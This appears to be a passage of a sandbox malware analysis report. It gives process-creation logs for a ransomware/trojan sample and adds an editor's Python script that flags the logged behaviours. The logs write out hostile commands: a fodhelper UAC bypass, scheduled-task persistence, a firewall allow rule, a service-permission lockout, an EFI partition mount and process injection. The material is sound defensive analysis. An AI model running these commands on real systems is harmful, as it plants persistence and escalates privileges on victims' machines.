        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
        Source: C:\Windows\SysWOW64\mountvol.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
        Source: C:\Windows\SysWOW64\mountvol.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
        Source: C:\Windows\SysWOW64\mountvol.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exe | Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
        Source: C:\Windows\SysWOW64\mountvol.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
        Source: C:\Windows\SysWOW64\shutdown.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\user\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\user\AppData\Local\Temp\csrss\tor\log.txt
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe -bind-address 127.0.0.1:31466
        Source: C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Users\user\Desktop\kdsyitkxmS.exeProcess created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe -bind-address 127.0.0.1:31466
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
        Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe fodhelper
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
        Source: C:\Windows\System32\fodhelper.exeProcess created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
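The process-creation rows above contain the four actions that matter most for triage of this sample: the auto-elevating fodhelper.exe launching C:\Windows\rss\csrss.exe (the fodhelper UAC-bypass pattern), a logon task at /RL HIGHEST pointing at that same binary, a firewall allow rule for it, and an sc sdset that rewrites the WmiPrvSE service security descriptor so that Administrators lose the WP (stop) and DT (pause/continue) rights and additionally get an explicit deny for them. The mountvol B: /s calls mount the EFI System Partition, which is consistent with the EfiGuardDxe.pdb path seen in memory further down. The following script is an added example, not part of the Joe Sandbox report: it parses rows in the report's format (a subset of the rows above is copied into the script as constructed sample input), flags those behaviours, and decodes the SDDL into named service rights. The directory allowlist, the rule names and the regexes are the editor's own assumptions; the two-letter right codes follow the standard SDDL-to-service-right mapping.

```python
import re

# SDDL two-letter access codes as the Service Control Manager interprets them
# on a service object; SD/RC/WD/WO are the standard rights.
SERVICE_RIGHTS = {
    "CC": "QUERY_CONFIG", "DC": "CHANGE_CONFIG", "LC": "QUERY_STATUS",
    "SW": "ENUMERATE_DEPENDENTS", "RP": "START", "WP": "STOP",
    "DT": "PAUSE_CONTINUE", "LO": "INTERROGATE", "CR": "USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
}
WELL_KNOWN_SIDS = {"SY": "SYSTEM", "BA": "Administrators", "IU": "Interactive",
                   "SU": "Service", "WD": "Everyone"}
# Directories from which an elevated launch / persistence target is not suspicious (assumption).
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\program files")

ACE_RE = re.compile(r"\((A|D|AU);(\w*);(\w+);;;(\w+)\)")
# Accepts both "csrss.exe  Process created:" and the fused "csrss.exeProcess created:" form.
ROW_RE = re.compile(r"^Source:\s*(?P<parent>\S+?)\s*Process created:\s*(?P<image>\S+)\s*(?P<cmd>.*)$")

# Constructed sample input: rows copied from the report, so the script runs offline.
SAMPLE_ROWS = [
    r"Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper",
    r"Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe fodhelper",
    r'Source: C:\Windows\System32\fodhelper.exe Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"',
    r'Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F',
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes',
    r"Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)",
    r"Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s",
    r"Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile",
]


def trusted(path):
    return path.lower().startswith(TRUSTED_DIRS)


def parse_sddl_aces(sddl):
    """Return (ace_type, trustee, [right names]) for every ACE in the DACL part of an SDDL string."""
    dacl = sddl.split("S:")[0]  # drop the SACL; only the DACL decides who may control the service
    aces = []
    for ace_type, _flags, rights, sid in ACE_RE.findall(dacl):
        names = [SERVICE_RIGHTS.get(rights[i:i + 2], rights[i:i + 2]) for i in range(0, len(rights), 2)]
        aces.append((ace_type, WELL_KNOWN_SIDS.get(sid, sid), names))
    return aces


def service_sddl_findings(service, sddl):
    """Flag explicit denies and an Administrators allow ACE that no longer grants STOP."""
    findings = []
    for ace_type, who, rights in parse_sddl_aces(sddl):
        if ace_type == "D":
            findings.append(("service-dacl-deny", f"{service}: {who} denied {'+'.join(rights)}"))
        if ace_type == "A" and who == "Administrators" and "STOP" not in rights:
            findings.append(("service-dacl-nostop", f"{service}: Administrators allow ACE lacks STOP"))
    return findings


def analyze(rows):
    """Run the triage rules over report rows; returns a list of (rule, detail) tuples."""
    findings = []
    for row in rows:
        m = ROW_RE.match(row)
        if not m:
            continue
        parent, image, cmd = m["parent"], m["image"], m["cmd"]
        pname = parent.rsplit("\\", 1)[-1].lower()
        iname = image.rsplit("\\", 1)[-1].lower()
        low = cmd.lower()
        # fodhelper.exe auto-elevates; it should never start a binary outside the trusted dirs.
        if pname == "fodhelper.exe" and not trusted(image):
            findings.append(("uac-bypass-fodhelper", image))
        # Logon task with highest run level whose action lives outside the trusted dirs.
        if iname == "schtasks.exe" and "/rl highest" in low:
            tr = re.search(r'/tr\s+"?([^"\s]+)', cmd, re.I)
            if tr and not trusted(tr.group(1)):
                findings.append(("persistence-schtasks", tr.group(1)))
        # Inbound firewall allow rule for a program outside the trusted dirs.
        if iname == "netsh.exe" and "action=allow" in low:
            prog = re.search(r'program="?([^"\s]+)', cmd, re.I)
            if prog and not trusted(prog.group(1)):
                findings.append(("firewall-allow-untrusted", prog.group(1)))
        # Service DACL rewrite: decode it instead of just noting that sc sdset ran.
        if iname == "sc.exe":
            sd = re.search(r"sdset\s+(\S+)\s+(D:\S+)", cmd, re.I)
            if sd:
                findings.extend(service_sddl_findings(sd.group(1), sd.group(2)))
        # mountvol <letter>: /s mounts the EFI System Partition.
        if iname == "mountvol.exe" and re.search(r"\s/s\b", low):
            findings.append(("efi-partition-mounted", cmd))
    return findings


if __name__ == "__main__":
    for rule, detail in analyze(SAMPLE_ROWS):
        print(f"{rule:26} {detail}")
```

On the SDDL finding: the Administrators allow ACE in the new descriptor carries CCDCLCSWRPLOCRSDRCWDWO, i.e. everything except WP and DT, and the (D;;WPDT;;;BA) entry denies exactly those two, so an administrator can no longer stop or pause WmiPrvSE through sc or services.msc even though the descriptor still grants WRITE_DAC. Compare against a clean host with `sc sdshow WmiPrvSE` before deciding that a host is affected; the allowlist of trusted directories is deliberately narrow and will need adjusting for environments that launch legitimate software from other paths.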
        Source: C:\Users\user\Desktop\kdsyitkxmS.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32
        Source: C:\Users\user\Desktop\kdsyitkxmS.exe  WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xnlrizwa.4cp.ps1
        Source: classification engine  Classification label: mal100.rans.troj.evad.winEXE@111/94@10/15
        Source: C:\Windows\System32\cmd.exe  File read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\01f6936167b38afa142d4ec8a8e5fb01\mscorlib.ni.dll
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5316:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:680:120:WilError_03
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8556:120:WilError_03
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:120:WilError_03
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:680:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8896:120:WilError_03
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8644:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_03
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5480:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9116:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9208:120:WilError_03
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1448:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8556:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4808:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2900:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8644:120:WilError_03
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5316:120:WilError_03
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:304:WilStaging_02
        Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe  Mutant created: \Sessions\1\BaseNamedObjects\Global\qtxp9g8w
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4164:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:120:WilError_03
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3308:120:WilError_03
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7124:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8312:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9208:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8296:120:WilError_03
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3308:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8856:120:WilError_03
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4808:120:WilError_03
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8856:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:120:WilError_03
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3504:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9052:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8896:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9116:120:WilError_03
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5480:120:WilError_03
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8296:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6076:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:120:WilError_03
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3560:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:120:WilError_03
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1448:120:WilError_03
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2900:120:WilError_03
        Source: C:\Windows\rss\csrss.exe  Mutant created: \Sessions\1\BaseNamedObjects\Global\h48yorbq6rm87zot
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3504:120:WilError_03
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3560:120:WilError_03
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4164:120:WilError_03
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6720:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6076:120:WilError_03
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9052:120:WilError_03
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6244:120:WilError_03
        Source: C:\Windows\System32\conhost.exe  Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8312:120:WilError_03
        Source: csrss.exe  String found in binary or memory: C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe -bind-address 127.0.0.1:31466
        Source: Window Recorder  Window detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
        Source: kdsyitkxmS.exe  Static PE information: Virtual size of .text is bigger than: 0x100000
        Source: C:\Windows\System32\fodhelper.exe  Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Outlook\Capabilities\UrlAssociations
        Source: C:\Windows\rss\csrss.exe  Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Uninstaller
        Source: kdsyitkxmS.exe  Static file information: File size 4379008 > 1048576
        Source: kdsyitkxmS.exe  Static PE information: Raw size of .text is bigger than: 0x100000 < 0x40b400
        Source: kdsyitkxmS.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: kdsyitkxmS.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: kdsyitkxmS.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: kdsyitkxmS.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: kdsyitkxmS.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: kdsyitkxmS.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: kdsyitkxmS.exe  Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: System.Data.pdb source: powershell.exe, 00000035.00000002.209088197993.000000006BC32000.00000020.00000001.01000000.00000012.sdmp
